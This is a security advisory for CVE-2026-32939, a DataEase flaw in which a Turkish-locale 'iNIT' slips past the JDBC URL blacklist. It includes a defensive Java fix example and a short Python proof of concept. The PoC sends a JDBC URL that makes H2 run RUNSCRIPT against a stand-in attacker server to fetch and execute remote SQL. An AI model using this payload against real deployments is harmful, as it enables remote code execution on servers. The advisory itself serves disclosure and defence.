Security Vulnerability Report
CVE-2026-32939 CVSS 8.1 HIGH

CVE-2026-32939

Published: 2026-03-20 04:16:49
Last Modified: 2026-03-23 19:25:45

Description

DataEase is an open source data visualization analysis tool. Versions 2.10.19 and below have inconsistent Locale handling between the JDBC URL validation logic and the H2 JDBC engine's internal parsing. DataEase uses String.toUpperCase() without specifying an explicit Locale, causing its security checks to rely on the JVM's default runtime locale, while H2 JDBC always normalizes URLs using Locale.ENGLISH. In Turkish locale environments (tr_TR), Java converts the lowercase letter i to İ (dotted capital I) instead of the standard I, so a malicious parameter like iNIT becomes İNIT in DataEase's filter (bypassing its blacklist) while H2 still correctly interprets it as INIT. This discrepancy allows attackers to smuggle dangerous JDBC parameters past DataEase's security validation, and the issue has been confirmed as exploitable in real DataEase deployment scenarios running under affected regional settings. The issue has been fixed in version 2.10.20.
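The mismatch described above, reproduced in isolation with a corrected check beside it. This is an added example, not DataEase's or H2's code: the class, the method names, the one-entry blacklist and the sample URL are assumptions made for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;

public class LocaleSafeJdbcCheck {
    // Assumed blacklist for illustration; the advisory names only INIT.
    private static final List<String> BLOCKED_KEYS = List.of("INIT");

    // Pattern from the advisory: toUpperCase() with no argument uses
    // Locale.getDefault(), so the result depends on where the JVM runs.
    static boolean isBlockedDefaultLocale(String jdbcUrl) {
        return hasBlockedKey(jdbcUrl.toUpperCase());
    }

    // Hardened form: normalize with the same fixed locale the advisory says
    // H2 uses (Locale.ENGLISH), so validator and engine see identical keys.
    static boolean isBlockedFixedLocale(String jdbcUrl) {
        return hasBlockedKey(jdbcUrl.toUpperCase(Locale.ENGLISH));
    }

    // Settings follow the database name as ;KEY=VALUE pairs.
    private static boolean hasBlockedKey(String normalizedUrl) {
        String[] parts = normalizedUrl.split(";");
        for (int i = 1; i < parts.length; i++) {
            String key = parts[i].split("=", 2)[0].trim();
            if (BLOCKED_KEYS.contains(key)) return true;
        }
        return false;
    }

    // Audit helper: JVM locales in which a key upper-cases differently
    // than it does under Locale.ENGLISH.
    static List<String> localesThatDisagree(String key) {
        List<String> out = new ArrayList<>();
        String expected = key.toUpperCase(Locale.ENGLISH);
        for (Locale l : Locale.getAvailableLocales()) {
            if (!key.toUpperCase(l).equals(expected)) out.add(l.toLanguageTag());
        }
        return out;
    }

    public static void main(String[] args) {
        String url = "jdbc:h2:mem:testdb;iNIT=SELECT 1"; // constructed, benign sample
        Locale saved = Locale.getDefault();
        try {
            Locale.setDefault(Locale.forLanguageTag("tr-TR"));
            System.out.println("default-locale check blocks: " + isBlockedDefaultLocale(url));
            System.out.println("fixed-locale check blocks:   " + isBlockedFixedLocale(url));
            System.out.println("locales that disagree on 'init': " + localesThatDisagree("init"));
        } finally {
            Locale.setDefault(saved);
        }
    }
}
```

The same audit can be applied to any security check that compares case-normalized strings: search the code base for `toUpperCase()` and `toLowerCase()` calls without a `Locale` argument.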

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* - VULNERABLE
DataEase <= 2.10.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-32939: DataEase Locale Handling Bypass
# This script demonstrates bypassing the blacklist check using Turkish Locale behavior.
# The lowercase 'i' becomes 'İ' in Turkish, bypassing the 'INIT' check in DataEase,
# but H2 engine interprets it as 'INIT'.
import requests

target_url = "http://target-dataease-instance/api/datasource/validate"

# Malicious JDBC URL payload
# Note: 'iNIT' bypasses the DataEase filter (tr_TR -> İNIT != INIT)
# H2 Engine (en_US -> iNIT -> INIT) executes it.
payload = {
    "jdbcUrl": "jdbc:h2:mem:testdb;iNIT=RUNSCRIPT FROM 'http://attacker-server/exploit.sql'",
    "host": "localhost",
    "port": "8080",
    "dbName": "testdb"
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if the script was executed by H2.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
